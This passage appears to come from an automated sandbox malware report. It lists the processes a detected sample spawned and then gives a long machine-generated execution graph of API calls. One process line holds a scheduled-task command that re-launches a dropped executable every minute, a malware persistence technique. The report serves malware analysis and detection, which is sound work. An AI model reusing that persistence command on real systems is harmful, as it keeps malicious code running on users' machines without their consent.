                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3411537097.0000000002D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3411537097.0000000002D97000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:8
                                                                                                                            Start time:05:24:08
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1
                                                                                                                            Imagebase:0xb10000
                                                                                                                            File size:187'904 bytes
                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:9
                                                                                                                            Start time:05:24:11
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:978'432 bytes
                                                                                                                            MD5 hash:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 47%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:12
                                                                                                                            Start time:05:24:18
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:978'432 bytes
                                                                                                                            MD5 hash:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:14
                                                                                                                            Start time:05:24:26
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:771'584 bytes
                                                                                                                            MD5 hash:27C056CC4DAFB6B3161272E800C85E55
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:17
                                                                                                                            Start time:05:24:28
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 3548
                                                                                                                            Imagebase:0x910000
                                                                                                                            File size:483'680 bytes
                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Target ID:18
                                                                                                                            Start time:05:24:34
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:978'432 bytes
                                                                                                                            MD5 hash:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:20
                                                                                                                            Start time:05:24:42
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:978'432 bytes
                                                                                                                            MD5 hash:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:21
                                                                                                                            Start time:05:25:01
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:978'432 bytes
                                                                                                                            MD5 hash:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:22
                                                                                                                            Start time:05:26:00
                                                                                                                            Start date:30/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
                                                                                                                            Imagebase:0x9b0000
                                                                                                                            File size:978'432 bytes
                                                                                                                            MD5 hash:8E44132C27ADC94100C8D8BE5D4AD041
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true


Execution Graph

Execution Coverage: 4.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 9.5%
Total number of Nodes: 2000
Total number of Limit Nodes: 44
101849->101850 101853 1784a6 81 API calls 101850->101853 101851->101827 101851->101832 101854 1d329f RegQueryValueExW 101852->101854 101855 1d330c RegQueryValueExW 101853->101855 101854->101827 101855->101827 101855->101857 101856 17ca8e 48 API calls 101856->101827 101857->101856 101859 17cdb4 48 API calls 101858->101859 101860 1c938a 101859->101860 101861 17cdb4 48 API calls 101860->101861 101862 1c939a 101861->101862 101863 17ca8e 48 API calls 101862->101863 101864 1c93a9 101863->101864 101865 1c93c2 select 101864->101865 101885 1c93ae Mailbox _memmove 101864->101885 101866 1c941f 101865->101866 101867 1c9414 WSAGetLastError 101865->101867 101868 19010a 48 API calls 101866->101868 101867->101885 101869 1c9428 101868->101869 101870 174bce 48 API calls 101869->101870 101871 1c9432 __WSAFDIsSet 101870->101871 101872 1c944a 101871->101872 101871->101885 101873 1c94f5 WSAGetLastError 101872->101873 101874 1c9463 101872->101874 101873->101885 101875 1c947b _strlen 101874->101875 101876 17cdb4 48 API calls 101874->101876 101874->101885 101877 1c94be 101875->101877 101878 1c948e 101875->101878 101876->101875 103508 1bad14 48 API calls _memset 101877->103508 103506 1ae0f5 48 API calls 2 library calls 101878->103506 101881 1c9497 103507 1cae5a 50 API calls 101881->103507 101883 1c94a3 101884 177bef 48 API calls 101883->101884 101884->101885 101885->101593 101887 1784a6 81 API calls 101886->101887 101888 1781e5 101887->101888 101889 1784a6 81 API calls 101888->101889 101890 1781fa 101889->101890 101891 1784a6 81 API calls 101890->101891 101892 17820d 101891->101892 101893 1784a6 81 API calls 101892->101893 101894 178223 101893->101894 101895 177b6e 48 API calls 101894->101895 101896 178237 101895->101896 101897 17cdb4 48 API calls 101896->101897 101951 17846a 101896->101951 101898 17825e 101897->101898 101899 1ed752 101898->101899 101924 178281 __wopenfile 101898->101924 101898->101951 101902 173320 48 API calls 101899->101902 101900 1ed91e 101904 173320 48 API calls 
101900->101904 101901 1ed95f 101903 173320 48 API calls 101901->101903 101905 1ed769 101902->101905 101906 1ed96a 101903->101906 101907 1ed928 101904->101907 101932 1ed790 101905->101932 103515 182320 50 API calls 101905->103515 103522 182320 50 API calls 101906->103522 101908 1784a6 81 API calls 101907->101908 101910 1ed93a 101908->101910 103521 1780ea 48 API calls _memmove 101910->103521 101912 1784a6 81 API calls 101915 178306 101912->101915 101913 1ed985 101921 1784a6 81 API calls 101913->101921 101918 1784a6 81 API calls 101915->101918 101917 1ed94e 101919 178182 48 API calls 101917->101919 101920 17831b 101918->101920 101925 1ed95c 101919->101925 101922 1ed7ed 101920->101922 101928 178342 101920->101928 101920->101951 101926 1ed9a0 101921->101926 101931 173320 48 API calls 101922->101931 101922->101951 101923 178182 48 API calls 101923->101932 101924->101912 101924->101922 101944 178364 101924->101944 101924->101951 103524 182320 50 API calls 101925->103524 103523 1780ea 48 API calls _memmove 101926->103523 101934 173320 48 API calls 101928->101934 101930 1ed9b4 101935 178182 48 API calls 101930->101935 101936 1ed84a 101931->101936 101932->101923 101937 17843f Mailbox 101932->101937 103516 1780ea 48 API calls _memmove 101932->103516 103517 182320 50 API calls 101932->103517 101938 17834c 101934->101938 101935->101925 103518 182320 50 API calls 101936->103518 101937->101593 101939 17c4cd 48 API calls 101938->101939 101939->101944 101944->101937 101946 1ed895 101944->101946 103509 19247b 59 API calls 2 library calls 101944->103509 103510 1780ea 48 API calls _memmove 101944->103510 103511 178182 101944->103511 103514 182320 50 API calls 101944->103514 101945 1ed8ce 101947 178182 48 API calls 101945->101947 101946->101945 101948 1ed8bf 101946->101948 101949 1ed8dc 101947->101949 103519 17bd2f 48 API calls _memmove 101948->103519 103520 182320 50 API calls 101949->103520 101951->101900 101951->101901 101953 1ed8ee 101955 17c4cd 48 API calls 101953->101955 
101955->101951 103525 18dd92 GetFileAttributesW 101956->103525 101960 19010a 48 API calls 101959->101960 101961 1750b3 101960->101961 101962 1750ec CloseHandle 101961->101962 101963 1750be 101962->101963 101963->101593 103530 1c6b19 101964->103530 101967 1c80a5 101968 173320 48 API calls 101967->101968 101969 1c80b3 101968->101969 103535 182320 50 API calls 101969->103535 101970 1c8102 101972 17cdb4 48 API calls 101970->101972 101977 1c80f5 101970->101977 101974 1c812b 101972->101974 101973 1c80cf 103536 182320 50 API calls 101973->103536 101976 17cdb4 48 API calls 101974->101976 101974->101977 101976->101977 101977->101593 101979 1719ee 83 API calls 101978->101979 101980 1d8062 101979->101980 101981 171dce 107 API calls 101980->101981 101982 1d806b 101981->101982 101983 1d8091 101982->101983 101984 1d806f 101982->101984 101985 17d3d2 48 API calls 101983->101985 101986 17ca8e 48 API calls 101984->101986 101987 1d809a 101985->101987 101991 1d808f Mailbox 101986->101991 103537 1ae2e8 101987->103537 101989 1d80aa 101990 177bef 48 API calls 101989->101990 101990->101991 101991->101593 101993 17ca8e 48 API calls 101992->101993 101994 1cb7a3 CoInitialize 101993->101994 101995 1cb7ae CoUninitialize 101994->101995 101996 1cb7b4 101994->101996 101995->101996 101997 1cb7d5 101996->101997 101998 17ca8e 48 API calls 101996->101998 101999 1cb81b 101997->101999 102000 1784a6 81 API calls 101997->102000 101998->101997 102001 1784a6 81 API calls 101999->102001 102002 1cb7ef 102000->102002 102003 1cb827 102001->102003 103581 1aa857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 102002->103581 102006 1cb9d3 SetErrorMode CoGetInstanceFromFile 102003->102006 102017 1cb861 102003->102017 102005 1cb802 102005->101999 102007 1cb807 102005->102007 102009 1cba1f CoGetObject 102006->102009 102010 1cba19 SetErrorMode 102006->102010 103582 1cc235 417 API calls Mailbox 102007->103582 102008 1cb8a8 GetRunningObjectTable 102014 1cb8b8 102008->102014 102015 1cb8cb 
102008->102015 102009->102010 102013 1cbaa8 102009->102013 102019 1cb9b1 102010->102019 103587 1cc235 417 API calls Mailbox 102013->103587 102014->102015 102032 1cb8ed 102014->102032 103583 1cc235 417 API calls Mailbox 102015->103583 102017->102008 102024 17cdb4 48 API calls 102017->102024 102030 1cb89a 102017->102030 102019->102013 102023 1cba53 102019->102023 102020 1cbad0 VariantClear 102020->101593 102021 1cb814 Mailbox 102021->102020 102022 1cbac2 SetErrorMode 102022->102021 102028 1cba6f 102023->102028 103585 1aac4b 51 API calls Mailbox 102023->103585 102027 1cb88a 102024->102027 102029 17cdb4 48 API calls 102027->102029 102027->102030 103586 1ba6f6 103 API calls 102028->103586 102029->102030 102030->102008 102032->102019 103584 1aac4b 51 API calls Mailbox 102032->103584 102034 17ca8e 48 API calls 102033->102034 102035 18ef25 102034->102035 102036 18effb 102035->102036 102037 18ef3e 102035->102037 102038 19010a 48 API calls 102036->102038 103611 18f0f3 48 API calls 102037->103611 102040 18f002 102038->102040 102041 18f00e 102040->102041 103613 175080 49 API calls 102040->103613 102043 1784a6 81 API calls 102041->102043 102049 18f01c 102043->102049 102044 18ef4d 102045 18ef73 102044->102045 102047 1e6942 102044->102047 102048 17cdb4 48 API calls 102044->102048 102046 18f03e 2 API calls 102045->102046 102050 18ef7a 102046->102050 102047->101593 102051 1e6965 102048->102051 102052 174bf9 56 API calls 102049->102052 102053 1e6980 102050->102053 102054 18ef87 102050->102054 102051->102045 102055 1e696d 102051->102055 102056 18f02b 102052->102056 102058 19010a 48 API calls 102053->102058 102059 17d3d2 48 API calls 102054->102059 102060 17cdb4 48 API calls 102055->102060 102056->102044 102057 1e6936 102056->102057 102057->102047 103614 174592 CloseHandle 102057->103614 102061 1e6986 102058->102061 102062 18ef8f 102059->102062 102060->102050 102063 1e699f 102061->102063 103615 173d65 ReadFile SetFilePointerEx 102061->103615 103588 18f04e 102062->103588 102070 1e69a3 
_memmove 102063->102070 103616 1bad14 48 API calls _memset 102063->103616 102067 18ef9e 102069 177bef 48 API calls 102067->102069 102067->102070 102071 18efb2 Mailbox 102069->102071 102072 18eff2 102071->102072 102073 1750ec CloseHandle 102071->102073 102072->101593 102074 18efe4 102073->102074 103612 174592 CloseHandle 102074->103612 102077 1784a6 81 API calls 102076->102077 102078 1d10fb LoadLibraryW 102077->102078 102079 1d111e 102078->102079 102080 1d110f 102078->102080 102079->102080 103640 1d28d9 48 API calls _memmove 102079->103640 102080->101593 103641 1d23c5 102082->103641 102086 1784a6 81 API calls 102085->102086 102087 1d17c7 102086->102087 102088 1b6f5b 63 API calls 102087->102088 102089 1d17d8 102088->102089 102089->101593 102091 18f48a 102090->102091 102092 18f47f 102090->102092 102095 1784a6 81 API calls 102091->102095 102117 18f498 Mailbox 102091->102117 102093 17cdb4 48 API calls 102092->102093 102093->102091 102094 19010a 48 API calls 102096 18f49f 102094->102096 102097 1e6841 102095->102097 102098 18f4af 102096->102098 103725 175080 49 API calls 102096->103725 102099 19297d __wsplitpath 47 API calls 102097->102099 102102 1784a6 81 API calls 102098->102102 102101 1e6859 102099->102101 102103 17caee 48 API calls 102101->102103 102104 18f4bf 102102->102104 102106 1e686a 102103->102106 102105 174bf9 56 API calls 102104->102105 102107 18f4ce 102105->102107 103726 1739e8 48 API calls 2 library calls 102106->103726 102109 1e68d4 GetLastError 102107->102109 102121 18f4d6 102107->102121 102112 1e68ed 102109->102112 102110 1e6878 102111 1e6895 102110->102111 103727 1b6f4b GetFileAttributesW FindFirstFileW FindClose 102110->103727 102113 17cdb4 48 API calls 102111->102113 102112->102121 103728 174592 CloseHandle 102112->103728 102113->102117 102114 18f4f0 102118 19010a 48 API calls 102114->102118 102115 1e6920 102119 19010a 48 API calls 102115->102119 102117->102094 102127 18f50a Mailbox 102117->102127 102122 18f4f5 102118->102122 102123 1e6925 
102119->102123 102120 1e6888 102120->102111 102126 1b6d6d 52 API calls 102120->102126 102121->102114 102121->102115 102125 17197e 48 API calls 102122->102125 102125->102127 102126->102111 102127->101593 102129 18e022 102128->102129 102130 18e034 102128->102130 102131 17d89e 50 API calls 102129->102131 102132 18e03a 102130->102132 102133 18e063 102130->102133 102136 18e02c 102131->102136 102134 19010a 48 API calls 102132->102134 102135 17d89e 50 API calls 102133->102135 102134->102136 102135->102136 102136->101549 103729 17a9a0 102137->103729 102139 1836e7 102140 183778 102139->102140 102141 1ea269 102139->102141 102197 183aa8 102139->102197 103741 18bc04 86 API calls 102140->103741 103746 1bd520 86 API calls 4 library calls 102141->103746 102146 18bc5c 48 API calls 102199 18396b Mailbox _memmove 102146->102199 102147 1ea3e9 103757 1bd520 86 API calls 4 library calls 102147->103757 102148 183793 102148->102197 102148->102199 102201 1ea68d 102148->102201 103734 1710e8 102148->103734 102152 1ea583 102155 17fa40 417 API calls 102152->102155 102153 1ea45c 103761 1bd520 86 API calls 4 library calls 102153->103761 102154 1ea289 102154->102147 103747 17d2d2 102154->103747 102158 1ea5b5 102155->102158 102168 17d380 55 API calls 102158->102168 102158->102197 102160 18384e 102165 1ea60c 102160->102165 102166 1838e5 102160->102166 102160->102199 102162 1ea40f 103758 18cf79 49 API calls 102162->103758 102163 1ea303 102176 1ea317 102163->102176 102180 1ea341 102163->102180 103766 1bd231 50 API calls 102165->103766 102171 19010a 48 API calls 102166->102171 102172 1ea5e6 102168->102172 102187 1838ec 102171->102187 103765 1bd520 86 API calls 4 library calls 102172->103765 102173 17fa40 417 API calls 102173->102199 102175 1ea42c 102177 1ea44d 102175->102177 102178 1ea441 102175->102178 103753 1bd520 86 API calls 4 library calls 102176->103753 103760 1bd520 86 API calls 4 library calls 102177->103760 103759 1bd520 86 API calls 4 library calls 102178->103759 102184 1ea366 
102180->102184 102188 1ea384 102180->102188 103754 1cf211 417 API calls 102184->103754 102185 17d89e 50 API calls 102185->102199 102191 17e1f0 417 API calls 102187->102191 102193 18399f 102187->102193 102189 1ea37a 102188->102189 103755 1cf4df 417 API calls 102188->103755 102189->102197 103756 18baef 48 API calls _memmove 102189->103756 102191->102199 102194 17c935 48 API calls 102193->102194 102195 1839c0 102193->102195 102194->102195 102195->102197 102200 1ea65e 102195->102200 102203 183a05 102195->102203 102196 19010a 48 API calls 102196->102199 102206 183ab5 Mailbox 102197->102206 103745 1bd520 86 API calls 4 library calls 102197->103745 102199->102146 102199->102152 102199->102153 102199->102154 102199->102172 102199->102173 102199->102185 102199->102193 102199->102196 102199->102197 103742 17d500 53 API calls __cinit 102199->103742 103743 17d420 53 API calls 102199->103743 103744 18baef 48 API calls _memmove 102199->103744 103762 1cd21a 82 API calls Mailbox 102199->103762 103763 1b89e0 53 API calls 102199->103763 103764 17d772 55 API calls 102199->103764 102202 17d89e 50 API calls 102200->102202 102201->102197 103767 1bd520 86 API calls 4 library calls 102201->103767 102202->102201 102203->102197 102203->102201 102204 183a95 102203->102204 102205 17d89e 50 API calls 102204->102205 102205->102197 102206->101593 102207->101593 102209 17d8ac 102208->102209 102213 17d8db Mailbox 102208->102213 102210 17d8ff 102209->102210 102212 17d8b2 Mailbox 102209->102212 102211 17c935 48 API calls 102210->102211 102211->102213 102214 17d8c7 102212->102214 102216 1e4e9b 102212->102216 102213->101567 102214->102213 102215 1e4e72 VariantClear 102214->102215 102215->102213 102216->102213 103771 1aa599 InterlockedDecrement 102216->103771 102219 17cafd __wsetenvp _memmove 102218->102219 102220 19010a 48 API calls 102219->102220 102221 17cb3b 102220->102221 102221->101588 102222->101593 102223->101593 102224->101593 102225->101593 102226->101556 102227->101558 102229 17c940 
102228->102229 102230 17c948 102228->102230 102231 17d805 48 API calls 102229->102231 102230->101580 102231->102230 102232->101588 102233->101580 102234->101555 102235->101570 102236->101559 102237->101566 102238->101577 102340 17d3d2 102239->102340 102241 1cf389 Mailbox 102242 1cf3cd 102241->102242 102243 1cf3e1 102241->102243 102259 1cf3a9 102241->102259 102351 177e53 102242->102351 102246 17c935 48 API calls 102243->102246 102244 17d89e 50 API calls 102257 1cf421 Mailbox 102244->102257 102247 1cf3df 102246->102247 102248 1cf429 102247->102248 102360 1ccdb5 417 API calls 102247->102360 102345 1ccd12 102248->102345 102251 1cf410 102251->102248 102253 1cf414 102251->102253 102252 1cf44b 102255 1cf457 102252->102255 102256 1cf4a2 102252->102256 102361 1bd338 86 API calls 4 library calls 102253->102361 102255->102259 102260 1cf476 102255->102260 102258 1cf34f 417 API calls 102256->102258 102257->101648 102258->102257 102259->102244 102362 17ca8e 102260->102362 102263 181606 102262->102263 102266 1814b2 102262->102266 102263->101669 102265 18156d 102265->101669 102268 19010a 48 API calls 102266->102268 102276 1814be 102266->102276 102267 1814c9 102267->102265 102271 19010a 48 API calls 102267->102271 102269 1e5299 102268->102269 102270 19010a 48 API calls 102269->102270 102277 1e52a4 102270->102277 102272 1815af 102271->102272 102273 1815c2 102272->102273 102487 18d6b4 48 API calls 102272->102487 102273->101669 102275 19010a 48 API calls 102275->102277 102276->102267 102488 17346e 48 API calls 102276->102488 102277->102275 102277->102276 102278->101630 102280 173435 102279->102280 102281 173444 102279->102281 102282 19010a 48 API calls 102280->102282 102281->101646 102282->102281 102283->101646 102284->101641 102285->101646 102286->101631 102287->101641 102288->101641 102289->101650 102290->101679 102292 18469f 102291->102292 102293 184537 102291->102293 102296 17caee 48 API calls 102292->102296 102294 184543 102293->102294 102295 1e7820 102293->102295 102489 184040 
102294->102489 102661 1ce713 417 API calls Mailbox 102295->102661 102303 1845e4 Mailbox 102296->102303 102299 184639 Mailbox 102299->101648 102300 1e782c 102300->102299 102662 1bd520 86 API calls 4 library calls 102300->102662 102302 184559 102302->102299 102302->102300 102302->102303 102306 1d1f19 132 API calls 102303->102306 102504 1c95af WSAStartup 102303->102504 102506 1750ec 102303->102506 102510 1d352a 102303->102510 102598 1c1080 102303->102598 102601 1c6fc3 102303->102601 102604 1bdce9 102303->102604 102609 1c9500 102303->102609 102618 18f55e 102303->102618 102627 1befcd 102303->102627 102306->102299 102314->101674 102315->101681 102316->101684 102317->101648 102318->101660 102320 1784be 102319->102320 102337 1784ba 102319->102337 102321 1784ea __itow Mailbox _wcscpy 102320->102321 102322 1e5592 __i64tow 102320->102322 102323 1784d2 102320->102323 102324 1e5494 102320->102324 102328 19010a 48 API calls 102321->102328 103215 19234b 80 API calls 3 library calls 102323->103215 102325 1e557a 102324->102325 102329 1e549d 102324->102329 103216 19234b 80 API calls 3 library calls 102325->103216 102330 1784f4 102328->102330 102329->102321 102331 1e54bc 102329->102331 102333 17caee 48 API calls 102330->102333 102330->102337 102332 19010a 48 API calls 102331->102332 102335 1e54d9 102332->102335 102333->102337 102334 19010a 48 API calls 102336 1e54ff 102334->102336 102335->102334 102336->102337 102338 17caee 48 API calls 102336->102338 102337->101671 102338->102337 102339->101661 102376 19010a 102340->102376 102342 17d3f3 102343 19010a 48 API calls 102342->102343 102344 17d401 102343->102344 102344->102241 102346 1ccd46 102345->102346 102347 1ccd21 102345->102347 102346->102252 102348 17ca8e 48 API calls 102347->102348 102349 1ccd2d 102348->102349 102407 1cc8b7 102349->102407 102352 177ecf 102351->102352 102355 177e5f __wsetenvp 102351->102355 102475 17a2fb 102352->102475 102354 177e85 _memmove 102354->102247 102356 177ec7 102355->102356 102357 177e7b 102355->102357 
102474 177eda 48 API calls 102356->102474 102471 17a6f8 102357->102471 102360->102251 102361->102257 102363 17cad0 102362->102363 102366 17ca9a 102362->102366 102364 17cae3 102363->102364 102365 17cad9 102363->102365 102483 17c4cd 102364->102483 102367 177e53 48 API calls 102365->102367 102369 19010a 48 API calls 102366->102369 102373 17cac6 102367->102373 102370 17caad 102369->102370 102371 1e4f11 102370->102371 102372 17cab8 102370->102372 102371->102373 102374 17d3d2 48 API calls 102371->102374 102372->102373 102375 17caee 48 API calls 102372->102375 102373->102257 102374->102373 102375->102373 102377 190112 __calloc_impl 102376->102377 102379 19012c 102377->102379 102380 19012e std::exception::exception 102377->102380 102385 1945ec 102377->102385 102379->102342 102399 197495 RaiseException 102380->102399 102382 190158 102400 1973cb 47 API calls _free 102382->102400 102384 19016a 102384->102342 102386 194667 __calloc_impl 102385->102386 102393 1945f8 __calloc_impl 102385->102393 102406 19889e 47 API calls __getptd_noexit 102386->102406 102389 19462b RtlAllocateHeap 102390 19465f 102389->102390 102389->102393 102390->102377 102392 194653 102404 19889e 47 API calls __getptd_noexit 102392->102404 102393->102389 102393->102392 102394 194603 102393->102394 102397 194651 102393->102397 102394->102393 102401 198e52 47 API calls 2 library calls 102394->102401 102402 198eb2 47 API calls 8 library calls 102394->102402 102403 191d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 102394->102403 102405 19889e 47 API calls __getptd_noexit 102397->102405 102399->102382 102400->102384 102401->102394 102402->102394 102404->102397 102405->102390 102406->102390 102409 1cc914 102407->102409 102410 1cc8f7 102407->102410 102465 1cc235 417 API calls Mailbox 102409->102465 102410->102409 102411 1ccc61 102410->102411 102412 1cc934 102410->102412 102413 1ccc6e 102411->102413 102414 1ccca9 102411->102414 102412->102409 102443 1aabf3 102412->102443 102461 18d6b4 48 API 
calls 102413->102461 102414->102409 102417 1cccb6 102414->102417 102416 1cc964 102416->102409 102418 1cc973 102416->102418 102463 18d6b4 48 API calls 102417->102463 102430 1cc9a1 102418->102430 102447 1aa8c8 102418->102447 102420 1ccc87 102462 1b97b6 89 API calls 102420->102462 102424 1cccd6 102464 1b503c 91 API calls Mailbox 102424->102464 102440 1ccc52 102440->102346 102444 1aac04 __wsetenvp 102443->102444 102446 1aac16 102443->102446 102444->102446 102466 173bcf 102444->102466 102446->102416 102461->102420 102462->102440 102463->102424 102464->102440 102465->102440 102467 173bd9 __wsetenvp 102466->102467 102468 19010a 48 API calls 102467->102468 102472 19010a 48 API calls 102471->102472 102473 17a702 102472->102473 102473->102354 102474->102354 102476 17a309 102475->102476 102478 17a321 _memmove 102475->102478 102476->102478 102479 17b8a7 102476->102479 102478->102354 102480 17b8ba 102479->102480 102482 17b8b7 _memmove 102479->102482 102481 19010a 48 API calls 102480->102481 102481->102482 102482->102478 102484 17c4e7 102483->102484 102486 17c4da 102483->102486 102485 19010a 48 API calls 102484->102485 102485->102486 102486->102373 102487->102273 102488->102267 102490 1e787b 102489->102490 102493 18406c 102489->102493 102664 1bd520 86 API calls 4 library calls 102490->102664 102492 1e788c 102665 1bd520 86 API calls 4 library calls 102492->102665 102493->102492 102498 1840a6 _memmove 102493->102498 102496 1841f1 102496->102302 102497 19010a 48 API calls 102497->102498 102498->102497 102499 17fa40 417 API calls 102498->102499 102500 184185 102498->102500 102501 1e78d8 102498->102501 102503 184175 102498->102503 102499->102498 102500->102302 102666 1bd520 86 API calls 4 library calls 102501->102666 102503->102500 102663 1cd21a 82 API calls Mailbox 102503->102663 102505 1c95e0 102504->102505 102505->102299 102507 1750f6 102506->102507 102508 175105 102506->102508 102507->102299 102508->102507 102509 17510a CloseHandle 102508->102509 102509->102507 102511 17d3d2 48 
API calls 102510->102511 102512 1d354a 102511->102512 102513 17d3d2 48 API calls 102512->102513 102514 1d3553 102513->102514 102515 17d3d2 48 API calls 102514->102515 102516 1d355c 102515->102516 102517 1784a6 81 API calls 102516->102517 102525 1d35e9 Mailbox 102516->102525 102518 1d3580 102517->102518 102667 1d3d7b 102518->102667 102525->102299 102747 1c22e5 102598->102747 102600 1c1090 102600->102299 102602 1784a6 81 API calls 102601->102602 102603 1c6fd6 SetWindowTextW 102602->102603 102603->102299 102605 1784a6 81 API calls 102604->102605 102606 1bdcfc 102605->102606 102935 1b6d6d 102606->102935 102608 1bdd06 102608->102299 102610 17cdb4 48 API calls 102609->102610 102611 1c9515 102610->102611 102612 1bbe47 50 API calls 102611->102612 102613 1c9522 102612->102613 102614 1c952f send 102613->102614 102615 1c9546 102614->102615 102616 1c956a 102615->102616 102617 1c9552 WSAGetLastError 102615->102617 102616->102299 102617->102616 102619 17cdb4 48 API calls 102618->102619 102620 18f572 102619->102620 102621 18f57a timeGetTime 102620->102621 102622 1e75d1 Sleep 102620->102622 102623 17cdb4 48 API calls 102621->102623 102624 18f590 102623->102624 102947 17e1f0 102624->102947 102628 1784a6 81 API calls 102627->102628 102629 1beff2 102628->102629 103199 1b78ad GetFullPathNameW 102629->103199 102634 1bf04b CoInitialize CoCreateInstance 102636 1bf08e 102634->102636 102637 1bf070 102634->102637 102661->102300 102662->102299 102663->102496 102664->102492 102665->102500 102666->102500 102668 17c4cd 48 API calls 102667->102668 102669 1d3d89 102668->102669 102670 17c4cd 48 API calls 102669->102670 102671 1d3d91 102670->102671 102748 1c2306 102747->102748 102749 1c230a 102748->102749 102750 1c2365 102748->102750 102751 19010a 48 API calls 102749->102751 102816 18f0f3 48 API calls 102750->102816 102753 1c2311 102751->102753 102754 1c231f 102753->102754 102803 175080 49 API calls 102753->102803 102756 1784a6 81 API calls 102754->102756 102757 1c2331 102756->102757 102804 174bf9 
